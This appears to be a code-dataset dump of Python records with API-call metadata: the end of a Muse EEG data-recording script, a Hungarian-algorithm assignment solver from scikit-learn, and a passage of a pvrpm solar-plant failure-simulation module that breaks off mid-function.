print("No EEG stream running yet. Trying to start the Muse EEG stream ...")
eeg_stream = subprocess.Popen([ currentpath + "/bci-stream"])
sleep(muse_connect_timout)
streams = resolve_byprop('type', 'EEG', timeout=2)
if len(streams) == 0:
raise(RuntimeError, "Cant find EEG stream")
else:
print("Success: found Muse EEG stream")
print("Start aquiring data")
inlet = StreamInlet(streams[0], max_chunklen=12)
eeg_time_correction = inlet.time_correction()
inlet_marker = False
#print("looking for a Markers stream...")
#marker_streams = resolve_byprop('type', 'Markers', timeout=2)
#if marker_streams:
# inlet_marker = StreamInlet(marker_streams[0])
# marker_time_correction = inlet_marker.time_correction()
#else:
# inlet_marker = False
# print("Cant find Markers stream")
info = inlet.info()
description = info.desc()
freq = info.nominal_srate()
Nchan = info.channel_count()
ch = description.child('channels').first_child()
ch_names = [ch.child_value('label')]
for i in range(1, Nchan):
ch = ch.next_sibling()
ch_names.append(ch.child_value('label'))
# Word Capturing
#currentWord = 1
currentTerm = "1"
t_word = time() + 1 * 2
words = []
terms = []
termBank = ["1", "2", "3"]
subdisplay = False
res = []
timestamps = []
markers = []
t_init = time()
print('Start recording at time t=%.3f' % t_init)
print(currentTerm)
while (time() - t_init) < options.duration:
if time() >= t_word:
if subdisplay:
subdisplay.kill()
# Check for new word
if time() >= t_word:
# sample or training data recording ?
if record_sample:
currentTerm = record_sample_term
else:
currentTerm = random.choice(termBank)
print(str(currentWord) +": " +currentTerm)
subdisplay = subprocess.Popen([ "/usr/bin/display", currentpath + "/images/" + currentTerm + ".png"])
currentWord += 1
t_word = time() + 1 * 2
try:
data, timestamp = inlet.pull_chunk(timeout=1.0, max_samples=12)
if timestamp:
res.append(data)
timestamps.extend(timestamp)
words.extend([currentWord] * len(timestamp))
terms.extend([currentTerm] * len(timestamp))
if inlet_marker:
marker, timestamp = inlet_marker.pull_sample(timeout=0.0)
if timestamp:
markers.append([marker, timestamp])
except KeyboardInterrupt:
break
if subdisplay:
subdisplay.kill()
res = np.concatenate(res, axis=0)
timestamps = np.array(timestamps)
if dejitter:
y = timestamps
X = np.atleast_2d(np.arange(0, len(y))).T
lr = LinearRegression()
lr.fit(X, y)
timestamps = lr.predict(X)
res = np.c_[timestamps, words, terms, res]
data = pd.DataFrame(data=res, columns=['timestamps'] + ['words'] + ['terms'] + ch_names)
data['Marker'] = 0
# process markers:
for marker in markers:
# find index of margers
ix = np.argmin(np.abs(marker[1] - timestamps))
val = timestamps[ix]
data.loc[ix, 'Marker'] = marker[0][0]
data.to_csv(fname, float_format='%.3f', index=False)
print('Wrote datafile: ' + fname)
if eeg_stream:
print("Found running EEG stream. Stopping it")
eeg_stream.kill()
print("Success")
| [
"subprocess.check_output",
"numpy.abs",
"os.listdir",
"random.choice",
"pylsl.StreamInlet",
"subprocess.Popen",
"os.path.join",
"optparse.OptionParser",
"pylsl.resolve_byprop",
"time.sleep",
"os.path.realpath",
"numpy.array",
"time.gmtime",
"numpy.concatenate",
"sys.exit",
"pandas.Data... | [((531, 545), 'optparse.OptionParser', 'OptionParser', ([], {}), '()\n', (543, 545), False, 'from optparse import OptionParser\n'), ((2457, 2497), 'pylsl.resolve_byprop', 'resolve_byprop', (['"""type"""', '"""EEG"""'], {'timeout': '(2)'}), "('type', 'EEG', timeout=2)\n", (2471, 2497), False, 'from pylsl import StreamInlet, resolve_byprop\n'), ((2916, 2956), 'pylsl.StreamInlet', 'StreamInlet', (['streams[0]'], {'max_chunklen': '(12)'}), '(streams[0], max_chunklen=12)\n', (2927, 2956), False, 'from pylsl import StreamInlet, resolve_byprop\n'), ((3822, 3828), 'time.time', 'time', ([], {}), '()\n', (3826, 3828), False, 'from time import time, strftime, gmtime, sleep\n'), ((5016, 5043), 'numpy.concatenate', 'np.concatenate', (['res'], {'axis': '(0)'}), '(res, axis=0)\n', (5030, 5043), True, 'import numpy as np\n'), ((5057, 5077), 'numpy.array', 'np.array', (['timestamps'], {}), '(timestamps)\n', (5065, 5077), True, 'import numpy as np\n'), ((5284, 5369), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'res', 'columns': "(['timestamps'] + ['words'] + ['terms'] + ch_names)"}), "(data=res, columns=['timestamps'] + ['words'] + ['terms'] +\n ch_names)\n", (5296, 5369), True, 'import pandas as pd\n'), ((375, 404), 'os.path.realpath', 'os.path.realpath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (391, 404), False, 'import os\n'), ((1424, 1435), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1432, 1435), False, 'import sys\n'), ((1632, 1656), 'os.listdir', 'os.listdir', (['options.path'], {}), '(options.path)\n', (1642, 1656), False, 'import os\n'), ((1972, 2027), 'subprocess.check_output', 'subprocess.check_output', (["['tail', '-1', last_data_file]"], {}), "(['tail', '-1', last_data_file])\n", (1995, 2027), False, 'import subprocess\n'), ((2618, 2665), 'subprocess.Popen', 'subprocess.Popen', (["[currentpath + '/bci-stream']"], {}), "([currentpath + '/bci-stream'])\n", (2634, 2665), False, 'import subprocess\n'), ((2671, 2697), 'time.sleep', 'sleep', (['muse_connect_timout'], {}), '(muse_connect_timout)\n', (2676, 2697), False, 'from time import time, strftime, gmtime, sleep\n'), ((2712, 2752), 'pylsl.resolve_byprop', 'resolve_byprop', (['"""type"""', '"""EEG"""'], {'timeout': '(2)'}), "('type', 'EEG', timeout=2)\n", (2726, 2752), False, 'from pylsl import StreamInlet, resolve_byprop\n'), ((3691, 3697), 'time.time', 'time', ([], {}), '()\n', (3695, 3697), False, 'from time import time, strftime, gmtime, sleep\n'), ((5166, 5184), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (5182, 5184), False, 'from sklearn.linear_model import LinearRegression\n'), ((3904, 3910), 'time.time', 'time', ([], {}), '()\n', (3908, 3910), False, 'from time import time, strftime, gmtime, sleep\n'), ((3948, 3954), 'time.time', 'time', ([], {}), '()\n', (3952, 3954), False, 'from time import time, strftime, gmtime, sleep\n'), ((4048, 4054), 'time.time', 'time', ([], {}), '()\n', (4052, 4054), False, 'from time import time, strftime, gmtime, sleep\n'), ((4320, 4411), 'subprocess.Popen', 'subprocess.Popen', (["['/usr/bin/display', currentpath + '/images/' + currentTerm + '.png']"], {}), "(['/usr/bin/display', currentpath + '/images/' +\n currentTerm + '.png'])\n", (4336, 4411), False, 'import subprocess\n'), ((5475, 5505), 'numpy.abs', 'np.abs', (['(marker[1] - timestamps)'], {}), '(marker[1] - timestamps)\n', (5481, 5505), True, 'import numpy as np\n'), ((1508, 1516), 'time.gmtime', 'gmtime', ([], {}), '()\n', (1514, 1516), False, 'from time import time, strftime, gmtime, sleep\n'), ((1805, 1837), 'os.path.join', 'os.path.join', (['options.path', 'file'], {}), '(options.path, file)\n', (1817, 1837), False, 'import os\n'), ((4223, 4246), 'random.choice', 'random.choice', (['termBank'], {}), '(termBank)\n', (4236, 4246), False, 'import random\n'), ((4452, 4458), 'time.time', 'time', ([], {}), '()\n', (4456, 4458), False, 'from time import time, strftime, gmtime, sleep\n'), ((1742, 1774), 'os.path.join', 'os.path.join', (['options.path', 'file'], {}), '(options.path, file)\n', (1754, 1774), False, 'import os\n')] |
# Hungarian algorithm (Kuhn-Munkres) for solving the linear sum assignment
# problem. Taken from scikit-learn. Based on original code by <NAME>,
# adapted to NumPy by <NAME>.
# Further improvements by <NAME>, <NAME> and <NAME>.
#
# Copyright (c) 2008 <NAME> <<EMAIL>>, <NAME>
# Author: <NAME>, <NAME>
# License: 3-clause BSD
import numpy as np
def linear_sum_assignment(cost_matrix):
"""Solve the linear sum assignment problem.
The linear sum assignment problem is also known as minimum weight matching
in bipartite graphs. A problem instance is described by a matrix C, where
each C[i,j] is the cost of matching vertex i of the first partite set
(a "worker") and vertex j of the second set (a "job"). The goal is to find
a complete assignment of workers to jobs of minimal cost.
Formally, let X be a boolean matrix where :math:`X[i,j] = 1` iff row i is
assigned to column j. Then the optimal assignment has cost
.. math::
\min \sum_i \sum_j C_{i,j} X_{i,j}
s.t. each row is assignment to at most one column, and each column to at
most one row.
This function can also solve a generalization of the classic assignment
problem where the cost matrix is rectangular. If it has more rows than
columns, then not every row needs to be assigned to a column, and vice
versa.
The method used is the Hungarian algorithm, also known as the Munkres or
Kuhn-Munkres algorithm.
Parameters
----------
cost_matrix : array
The cost matrix of the bipartite graph.
Returns
-------
row_ind, col_ind : array
An array of row indices and one of corresponding column indices giving
the optimal assignment. The cost of the assignment can be computed
as ``cost_matrix[row_ind, col_ind].sum()``. The row indices will be
sorted; in the case of a square cost matrix they will be equal to
``numpy.arange(cost_matrix.shape[0])``.
Notes
-----
.. versionadded:: 0.17.0
Examples
--------
>>> cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
>>> from scipy.optimize import linear_sum_assignment
>>> row_ind, col_ind = linear_sum_assignment(cost)
>>> col_ind
array([1, 0, 2])
>>> cost[row_ind, col_ind].sum()
5
References
----------
1. http://csclab.murraystate.edu/bob.pilgrim/445/munkres.html
2. <NAME>. The Hungarian Method for the assignment problem.
*Naval Research Logistics Quarterly*, 2:83-97, 1955.
3. <NAME>. Variants of the Hungarian method for assignment
problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956.
4. <NAME>. Algorithms for the Assignment and Transportation Problems.
*J. SIAM*, 5(1):32-38, March, 1957.
5. https://en.wikipedia.org/wiki/Hungarian_algorithm
"""
cost_matrix = np.asarray(cost_matrix)
if len(cost_matrix.shape) != 2:
raise ValueError("expected a matrix (2-d array), got a %r array"
% (cost_matrix.shape,))
# The algorithm expects more columns than rows in the cost matrix.
if cost_matrix.shape[1] < cost_matrix.shape[0]:
cost_matrix = cost_matrix.T
transposed = True
else:
transposed = False
state = _Hungary(cost_matrix)
# No need to bother with assignments if one of the dimensions
# of the cost matrix is zero-length.
step = None if 0 in cost_matrix.shape else _step1
while step is not None:
step = step(state)
if transposed:
marked = state.marked.T
else:
marked = state.marked
return np.where(marked == 1)
class _Hungary(object):
"""State of the Hungarian algorithm.
Parameters
----------
cost_matrix : 2D matrix
The cost matrix. Must have shape[1] >= shape[0].
"""
def __init__(self, cost_matrix):
self.C = cost_matrix.copy()
n, m = self.C.shape
self.row_uncovered = np.ones(n, dtype=bool)
self.col_uncovered = np.ones(m, dtype=bool)
self.Z0_r = 0
self.Z0_c = 0
self.path = np.zeros((n + m, 2), dtype=int)
self.marked = np.zeros((n, m), dtype=int)
def _clear_covers(self):
"""Clear all covered matrix cells"""
self.row_uncovered[:] = True
self.col_uncovered[:] = True
# Individual steps of the algorithm follow, as a state machine: they return
# the next step to be taken (function to be called), if any.
def _step1(state):
"""Steps 1 and 2 in the Wikipedia page."""
# Step 1: For each row of the matrix, find the smallest element and
# subtract it from every element in its row.
state.C -= state.C.min(axis=1)[:, np.newaxis]
# Step 2: Find a zero (Z) in the resulting matrix. If there is no
# starred zero in its row or column, star Z. Repeat for each element
# in the matrix.
for i, j in zip(*np.where(state.C == 0)):
if state.col_uncovered[j] and state.row_uncovered[i]:
state.marked[i, j] = 1
state.col_uncovered[j] = False
state.row_uncovered[i] = False
state._clear_covers()
return _step3
def _step3(state):
"""
Cover each column containing a starred zero. If n columns are covered,
the starred zeros describe a complete set of unique assignments.
In this case, Go to DONE, otherwise, Go to Step 4.
"""
marked = (state.marked == 1)
state.col_uncovered[np.any(marked, axis=0)] = False
if marked.sum() < state.C.shape[0]:
return _step4
def _step4(state):
"""
Find a noncovered zero and prime it. If there is no starred zero
in the row containing this primed zero, Go to Step 5. Otherwise,
cover this row and uncover the column containing the starred
zero. Continue in this manner until there are no uncovered zeros
left. Save the smallest uncovered value and Go to Step 6.
"""
# We convert to int as numpy operations are faster on int
C = (state.C == 0).astype(int)
covered_C = C * state.row_uncovered[:, np.newaxis]
covered_C *= np.asarray(state.col_uncovered, dtype=int)
n = state.C.shape[0]
m = state.C.shape[1]
while True:
# Find an uncovered zero
row, col = np.unravel_index(np.argmax(covered_C), (n, m))
if covered_C[row, col] == 0:
return _step6
else:
state.marked[row, col] = 2
# Find the first starred element in the row
star_col = np.argmax(state.marked[row] == 1)
if state.marked[row, star_col] != 1:
# Could not find one
state.Z0_r = row
state.Z0_c = col
return _step5
else:
col = star_col
state.row_uncovered[row] = False
state.col_uncovered[col] = True
covered_C[:, col] = C[:, col] * (
np.asarray(state.row_uncovered, dtype=int))
covered_C[row] = 0
def _step5(state):
"""
Construct a series of alternating primed and starred zeros as follows.
Let Z0 represent the uncovered primed zero found in Step 4.
Let Z1 denote the starred zero in the column of Z0 (if any).
Let Z2 denote the primed zero in the row of Z1 (there will always be one).
Continue until the series terminates at a primed zero that has no starred
zero in its column. Unstar each starred zero of the series, star each
primed zero of the series, erase all primes and uncover every line in the
matrix. Return to Step 3
"""
count = 0
path = state.path
path[count, 0] = state.Z0_r
path[count, 1] = state.Z0_c
while True:
# Find the first starred element in the col defined by
# the path.
row = np.argmax(state.marked[:, path[count, 1]] == 1)
if state.marked[row, path[count, 1]] != 1:
# Could not find one
break
else:
count += 1
path[count, 0] = row
path[count, 1] = path[count - 1, 1]
# Find the first prime element in the row defined by the
# first path step
col = np.argmax(state.marked[path[count, 0]] == 2)
if state.marked[row, col] != 2:
col = -1
count += 1
path[count, 0] = path[count - 1, 0]
path[count, 1] = col
# Convert paths
for i in range(count + 1):
if state.marked[path[i, 0], path[i, 1]] == 1:
state.marked[path[i, 0], path[i, 1]] = 0
else:
state.marked[path[i, 0], path[i, 1]] = 1
state._clear_covers()
# Erase all prime markings
state.marked[state.marked == 2] = 0
return _step3
def _step6(state):
"""
Add the value found in Step 4 to every element of each covered row,
and subtract it from every element of each uncovered column.
Return to Step 4 without altering any stars, primes, or covered lines.
"""
# the smallest uncovered value in the matrix
if np.any(state.row_uncovered) and np.any(state.col_uncovered):
minval = np.min(state.C[state.row_uncovered], axis=0)
minval = np.min(minval[state.col_uncovered])
state.C[~state.row_uncovered] += minval
state.C[:, state.col_uncovered] -= minval
return _step4
| [
"numpy.ones",
"numpy.where",
"numpy.asarray",
"numpy.argmax",
"numpy.any",
"numpy.zeros",
"numpy.min"
] | [((2927, 2950), 'numpy.asarray', 'np.asarray', (['cost_matrix'], {}), '(cost_matrix)\n', (2937, 2950), True, 'import numpy as np\n'), ((3713, 3734), 'numpy.where', 'np.where', (['(marked == 1)'], {}), '(marked == 1)\n', (3721, 3734), True, 'import numpy as np\n'), ((6247, 6289), 'numpy.asarray', 'np.asarray', (['state.col_uncovered'], {'dtype': 'int'}), '(state.col_uncovered, dtype=int)\n', (6257, 6289), True, 'import numpy as np\n'), ((4074, 4096), 'numpy.ones', 'np.ones', (['n'], {'dtype': 'bool'}), '(n, dtype=bool)\n', (4081, 4096), True, 'import numpy as np\n'), ((4127, 4149), 'numpy.ones', 'np.ones', (['m'], {'dtype': 'bool'}), '(m, dtype=bool)\n', (4134, 4149), True, 'import numpy as np\n'), ((4217, 4248), 'numpy.zeros', 'np.zeros', (['(n + m, 2)'], {'dtype': 'int'}), '((n + m, 2), dtype=int)\n', (4225, 4248), True, 'import numpy as np\n'), ((4272, 4299), 'numpy.zeros', 'np.zeros', (['(n, m)'], {'dtype': 'int'}), '((n, m), dtype=int)\n', (4280, 4299), True, 'import numpy as np\n'), ((5595, 5617), 'numpy.any', 'np.any', (['marked'], {'axis': '(0)'}), '(marked, axis=0)\n', (5601, 5617), True, 'import numpy as np\n'), ((8001, 8048), 'numpy.argmax', 'np.argmax', (['(state.marked[:, path[count, 1]] == 1)'], {}), '(state.marked[:, path[count, 1]] == 1)\n', (8010, 8048), True, 'import numpy as np\n'), ((8386, 8430), 'numpy.argmax', 'np.argmax', (['(state.marked[path[count, 0]] == 2)'], {}), '(state.marked[path[count, 0]] == 2)\n', (8395, 8430), True, 'import numpy as np\n'), ((9258, 9285), 'numpy.any', 'np.any', (['state.row_uncovered'], {}), '(state.row_uncovered)\n', (9264, 9285), True, 'import numpy as np\n'), ((9290, 9317), 'numpy.any', 'np.any', (['state.col_uncovered'], {}), '(state.col_uncovered)\n', (9296, 9317), True, 'import numpy as np\n'), ((9337, 9381), 'numpy.min', 'np.min', (['state.C[state.row_uncovered]'], {'axis': '(0)'}), '(state.C[state.row_uncovered], axis=0)\n', (9343, 9381), True, 'import numpy as np\n'), ((9400, 9435), 'numpy.min', 'np.min', (['minval[state.col_uncovered]'], {}), '(minval[state.col_uncovered])\n', (9406, 9435), True, 'import numpy as np\n'), ((5032, 5054), 'numpy.where', 'np.where', (['(state.C == 0)'], {}), '(state.C == 0)\n', (5040, 5054), True, 'import numpy as np\n'), ((6432, 6452), 'numpy.argmax', 'np.argmax', (['covered_C'], {}), '(covered_C)\n', (6441, 6452), True, 'import numpy as np\n'), ((6663, 6696), 'numpy.argmax', 'np.argmax', (['(state.marked[row] == 1)'], {}), '(state.marked[row] == 1)\n', (6672, 6696), True, 'import numpy as np\n'), ((7106, 7148), 'numpy.asarray', 'np.asarray', (['state.row_uncovered'], {'dtype': 'int'}), '(state.row_uncovered, dtype=int)\n', (7116, 7148), True, 'import numpy as np\n')] |
from abc import ABC, abstractmethod
import numpy as np
import pandas as pd
from pvrpm.core.enums import ConfigKeys as ck
from pvrpm.core.case import SamCase
from pvrpm.core.utils import sample, get_higher_components
from pvrpm.core.modules.monitor import IndepMonitor
class Failure(ABC):
"""
This abstract class defines how a failure should be set up
"""
def __init__(
self,
level: str,
comp_level_df: pd.DataFrame,
case: SamCase,
indep_monitoring: IndepMonitor = None,
):
"""
Initalizes a failure instance
Args:
level (str): The component level this failure is apart of
comp_level_df (:obj:`pd.DataFrame`): The component level dataframe containing the simulation data
case (:obj:`SamCase`): The SAM case for this simulation
indep_monitoring (:obj:`IndepMonitoring`, Optional): For updating static monitoring during simulation
"""
super().__init__()
self.level = level
self.df = comp_level_df
self.case = case
self.fails_per_day = {}
self.indep_monitoring = indep_monitoring
self.last_failure_day = 0
self.mean = None
self.initialize_components()
@abstractmethod
def initialize_components(self):
"""
Initalizes failure data for all components to be tracked during simulation for this failure type
Note:
Updates the underlying dataframes in place
"""
pass
@abstractmethod
def reinitialize_components(self, df: pd.DataFrame) -> pd.DataFrame:
"""
Reinitalize components in a dataframe similiar to the inital initalization. Used for when repairs or other things may occur
Args:
df (:obj:`pd.DataFrame`): The dataframe containing the components to reinitalize
Returns:
:obj:`pd.DataFrame`: The reinitalized components
"""
pass
@abstractmethod
def update(self, day: int):
"""
Perform a failure update for one day in the simulation:
Changes state of a component to failed, incrementing failures and checking warranty only for failed components of each failure type
Args:
day (int): Current day in the simulation
Note:
Updates the underlying dataframes in place
"""
pass
class TotalFailure(Failure):
"""
Describes how a total failure of a component should operate
"""
def initialize_components(self):
component_info = self.case.config[self.level]
df = self.df
failure_modes = list(component_info.get(ck.FAILURE, {}).keys())
self.mean = {} # init mean for each failure mode
possible_failure_times = np.zeros((component_info[ck.NUM_COMPONENT], len(failure_modes)))
for i, mode in enumerate(failure_modes):
self.mean[mode] = 0
# initalize failure mode by type
df[f"failure_by_type_{mode}"] = 0
fail = component_info[ck.FAILURE][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
frac = fail[ck.FRAC] if ck.FRAC in fail else fail[ck.DECAY_FRAC]
# choose a percentage of components to be defective
sample_ = np.random.random_sample(size=component_info[ck.NUM_COMPONENT])
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(list(defective), sample_, np.finfo(np.float32).max)
else:
# setup failure times for each component
possible_failure_times[:, i] = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
# initalize failures per day for this failure mode
self.fails_per_day[mode] = np.zeros(self.case.config[ck.LIFETIME_YRS] * 365)
failure_ind = np.argmin(possible_failure_times, axis=1)
df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
df["failure_type"] = [failure_modes[i] for i in failure_ind]
def reinitialize_components(self, df: pd.DataFrame) -> pd.DataFrame:
component_info = self.case.config[self.level]
failure_modes = list(component_info.get(ck.FAILURE, {}).keys())
fraction_failures = []
num_repaired = len(df)
possible_failure_times = np.zeros((num_repaired, len(failure_modes)))
for i, mode in enumerate(failure_modes):
fail = component_info[ck.FAILURE][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
frac = 0
if fail.get(ck.FRAC, None):
fraction_failures.append(mode)
frac = fail[ck.FRAC]
else:
frac = fail[ck.DECAY_FRAC]
# choose a percentage of modules to be defective
sample_ = np.random.random_sample(size=num_repaired)
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(
list(defective),
sample_,
np.finfo(np.float32).max,
)
else:
# setup failure times for each component
possible_failure_times[:, i] = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
failure_ind = np.argmin(possible_failure_times, axis=1)
df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
df["failure_type"] = [failure_modes[i] for i in failure_ind]
# now, need to make sure that our fractional failures percentages are met for all components in this level
# TODO: need to speed this up somehow
if fraction_failures:
# removes the diminishing effect where at the beginning of the simulation frac modules are a defective failure, then frac of frac is defective, etc.
# possible failure times will also include whatever the current failure time is for the component, if its less then a defective one it doesn't change
possible_failure_times = np.zeros((len(self.df), len(fraction_failures) + 1))
possible_failure_times.fill(np.finfo(np.float32).max)
# NOTE: i think i should just instead of doing the whole df, find the fraction, then sample that fraction from the components and just update those using the same method below
for i, mode in enumerate(fraction_failures):
counts = (self.df["failure_type"].astype(str) == mode).sum()
frac = counts / len(self.df)
fail = component_info[ck.FAILURE][mode]
if frac >= fail[ck.FRAC]:
continue
sample_ = np.random.random_sample(size=len(self.df))
# we just want the difference in fractions to bump it up to the failure fraction
defective = sample_ < (fail[ck.FRAC] - frac)
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(self.df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(
list(defective),
sample_,
np.finfo(np.float32).max,
)
possible_failure_times[:, -1] = self.df["time_to_failure"]
failure_ind = np.argmin(possible_failure_times, axis=1)
types = []
for comp, i in enumerate(failure_ind):
if i != len(fraction_failures):
types.append(fraction_failures[i])
else:
types.append(self.df["failure_type"].iloc[comp])
self.df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
self.df["failure_type"] = np.array(types).astype(str)
return df
def update(self, day: int):
df = self.df
# decrement time to failures for operational modules
# TODO: change this to state > 0 once partial failures implemented
df["time_to_failure"] -= 1
failure_modes = list(self.case.config[self.level][ck.FAILURE].keys())
# TODO: change this to state > 0 once partial failures implemented
mask = (df["state"] == 1) & (df["time_to_failure"] < 1)
failed_comps = df.loc[mask].copy()
if len(failed_comps) > 0:
self.last_failure_day = day
failed_comps["time_to_failure"] = 0
failed_comps["cumulative_failures"] += 1
for fail in failure_modes:
fail_mask = failed_comps["failure_type"].astype(str) == fail
failed_comps.loc[fail_mask, f"failure_by_type_{fail}"] += 1
self.fails_per_day[fail][day] += len(failed_comps.loc[fail_mask])
warranty_mask = failed_comps["time_left_on_warranty"] <= 0
failed_comps.loc[warranty_mask, "cumulative_oow_failures"] += 1
failed_comps["state"] = 0
# update time to detection times for component levels with only independent monitoring
# which will have None for monitor times
try:
if failed_comps["monitor_times"].isnull().any():
# monitor and time to detection will be the time to next indep monitoring
indep_monitors = list(self.case.config[self.level][ck.INDEP_MONITOR].keys())
# next indep monitoring is the min of the possible indep monitors for this component level
failed_comps["monitor_times"] = np.amin(self.indep_monitoring.indep_monitoring[indep_monitors])
# in order to calculate the time to detection for component levels only monitoring by an
# independment monitoring with a threshold (no interval), need to instead
# set the nans that will be there to the day in the simulation when these components failed
# so it can be calculated later
failed_comps["monitor_times"] = failed_comps["monitor_times"].fillna(day)
failed_comps["time_to_detection"] = None # failed_comps["monitor_times"].copy()
# fails if no monitoring defined, faster then just doing a check if the column exists or whatever
except KeyError:
pass
df.loc[mask] = failed_comps
else:
# check to see when last failure was for fraction failure, and update components with new failures
# if its been longer then the mean time of the distribution
# this is so if repairs arent occuring due to poor monitoring, failures are still occuring
failure_modes = list(self.case.config[self.level].get(ck.FAILURE, {}).keys())
fraction_failures = []
for mode in failure_modes:
fail = self.case.config[self.level][ck.FAILURE][mode]
if fail.get(ck.FRAC, None):
# extract mean, since some distributions might not have mean defined in params
if self.mean[mode] == 0:
self.mean[mode] = sample(fail[ck.DIST], fail[ck.PARAM], 10000).mean()
if day > (self.mean[mode] + self.last_failure_day):
fraction_failures.append(mode)
self.last_failure_day = day
for mode in fraction_failures:
# fail new fraction of components
# possible failure times will also include whatever the current failure time is for the component, if its less then a defective one it doesn't change
possible_failure_times = np.zeros((len(self.df), len(fraction_failures) + 1))
possible_failure_times.fill(np.finfo(np.float32).max)
# NOTE: i think i should just instead of doing the whole df, find the fraction, then sample that fraction from the components and just update those using the same method below
for i, mode in enumerate(fraction_failures):
fail = self.case.config[self.level][ck.FAILURE][mode]
sample_ = np.random.random_sample(size=len(self.df))
defective = sample_ < fail[ck.FRAC]
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(self.df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(
list(defective),
sample_,
np.finfo(np.float32).max,
)
possible_failure_times[:, -1] = self.df["time_to_failure"]
failure_ind = np.argmin(possible_failure_times, axis=1)
types = []
for comp, i in enumerate(failure_ind):
if i != len(fraction_failures):
types.append(fraction_failures[i])
else:
types.append(self.df["failure_type"].iloc[comp])
self.df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
self.df["failure_type"] = np.array(types).astype(str)
class PartialFailure(Failure):
"""
Specifies a decrease in the state of a component via a failure
Unlike total failures, every defined partial failure will have its own object, instead of manaing all of them at once
"""
def __init__(
self,
level: str,
comp_level_df: pd.DataFrame,
case: SamCase,
mode: str,
indep_monitoring: IndepMonitor = None,
):
"""
Initalizes a partial failure instance
Args:
level (str): The component level this failure is apart of
comp_level_df (:obj:`pd.DataFrame`): The component level dataframe containing the simulation data
case (:obj:`SamCase`): The SAM case for this simulation
mode (str): The name of the partial failure mode
indep_monitoring (:obj:`IndepMonitoring`, Optional): For updating static monitoring during simulation
"""
self.mode = mode
super().__init__(level, comp_level_df, case, indep_monitoring=indep_monitoring)
def initialize_components(self):
component_info = self.case.config[self.level]
df = self.df
mode = self.mode
failure_times = None
# initalize failure mode by type
df[f"failure_by_type_{mode}"] = 0
fail = component_info[ck.PARTIAL_FAIL][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
frac = fail[ck.FRAC] if ck.FRAC in fail else fail[ck.DECAY_FRAC]
# choose a percentage of components to be defective
sample_ = np.random.random_sample(size=component_info[ck.NUM_COMPONENT])
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
failure_times = np.where(list(defective), sample_, np.nan)
else:
# setup failure times for each component
failure_times = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
# initalize failures per day for this failure mode
self.fails_per_day = {self.mode: np.zeros(self.case.config[ck.LIFETIME_YRS] * 365)}
df[f"time_to_failure_{mode}"] = failure_times
def reinitialize_components(self, df: pd.DataFrame) -> pd.DataFrame:
component_info = self.case.config[self.level]
num_repaired = len(df)
fraction_failure = False
failure_times = None
mode = self.mode
fail = component_info[ck.PARTIAL_FAIL][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
if fail.get(ck.FRAC, None):
fraction_failure = True
frac = fail[ck.FRAC]
else:
frac = fail[ck.DECAY_FRAC]
# choose a percentage of modules to be defective
sample_ = np.random.random_sample(size=num_repaired)
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
# only give a possible failure time if the module is defective, otherwise it is set to nan, partial failure is not applied
failure_times = np.where(list(defective), sample_, np.nan)
else:
# setup failure times for each component
failure_times = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
df[f"time_to_failure_{mode}"] = failure_times
# now, need to make sure that our fractional failure percentage is met for all components in this level
# TODO: need to speed this up somehow
if fraction_failure:
# removes the diminishing effect where at the beginning of the simulation frac modules are a defective failure, then frac of frac is defective, etc.
# NOTE: i think i should just instead of doing the whole df, find the fraction, then sample that fraction from the components and just update those using the same method below
# number currently with failure mode is going to be the number non nan time_to_failures
counts = self.df[f"time_to_failure_{mode}"].isna()
update_df = self.df.loc[counts].copy()
frac = (~counts).sum() / len(self.df)
if frac >= fail[ck.FRAC]:
return df
sample_ = np.random.random_sample(size=len(update_df))
# we just want the difference in fractions to bump it up to the failure fraction
defective = sample_ < (fail[ck.FRAC] - frac)
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(update_df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
failure_times = np.where(
list(defective),
sample_,
np.nan,
)
update_df[f"time_to_failure_{mode}"] = failure_times
self.df.loc[counts] = update_df
return df
def update(self, day: int):
df = self.df
# decrement time to failures
df[f"time_to_failure_{self.mode}"] -= 1
mask = (df["state"] == 1) & (df[f"time_to_failure_{self.mode}"] < 1)
failed_comps = df.loc[mask].copy()
if len(failed_comps) > 0:
self.last_failure_day = day
failed_comps["cumulative_failures"] += 1
failed_comps[f"failure_by_type_{self.mode}"] += 1
self.fails_per_day[self.mode][day] += len(failed_comps)
warranty_mask = failed_comps["time_left_on_warranty"] <= 0
